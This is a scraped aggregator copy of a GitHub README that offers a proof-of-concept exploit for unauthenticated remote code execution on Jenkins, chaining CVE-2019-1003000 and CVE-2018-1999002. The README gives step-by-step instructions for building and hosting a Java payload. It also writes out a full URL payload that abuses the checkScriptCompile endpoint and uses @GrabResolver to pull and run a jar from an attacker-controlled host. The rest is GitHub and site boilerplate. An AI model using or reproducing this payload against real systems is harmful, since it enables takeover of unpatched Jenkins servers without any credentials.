Jenkins RCE PoC. From unauthenticated user to remote code execution (Chaining CV...
source link: https://www.tuicool.com/articles/hit/rIfAjeM
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Join GitHub today
GitHub is home to over 31 million developers working together to host and review code, manage projects, and build software together.
Sign upJenkins RCE PoC. From unauthenticated user to remote code execution - it's a hacker's dream! (Chaining CVE-2019-1003000, CVE-2018-1999002, and more)
exploit jenkins rce orangetw unauthenticated hacking
Clone with HTTPS
Use Git or checkout with SVN using the web URL.
Launching GitHub Desktop ...
If nothing happens, download GitHub Desktop and try again.
Launching GitHub Desktop ...
If nothing happens, download GitHub Desktop and try again.
Launching Xcode ...
If nothing happens, download Xcode and try again.
Launching Visual Studio ...
If nothing happens, download the GitHub extension for Visual Studio and try again.
README.txt
JENKINS UNAUTHENTICATED REMOTE CODE EXECUTION --------------------------------------------- Exploit compiled by me, but full credits for exploit discovery and exploit chaining go to Orange Tsai (orange.tw). Read his write-ups on this exploit here - Part 1: <a href="https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html" rel="nofollow">https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html</a> Part 2: <a href="http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html" rel="nofollow">http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html</a> His github: <a href="https://github.com/orangetw">https://github.com/orangetw</a> INSTRUCTIONS: ------------- - Edit code/Payload.java to your specifications, then run build.sh to generate a jar and copy it to the web folder. - Once that is finished, copy the inner contents of www/ to a webserver. - In the URL payload, replace <TARGET HOST> with the hostname of the server, and <EXPLOIT HOST> to the hostname of where you uploaded your files. URL Payload: ------------ http://<TARGET HOST>/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile ?value= @GrabConfig(disableChecksums=true)%0a @GrabResolver(name='payload', root='http://<EXPOIT HOST>')%0a @Grab(group='package', module='payload', version='1')%0a import Payload;
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK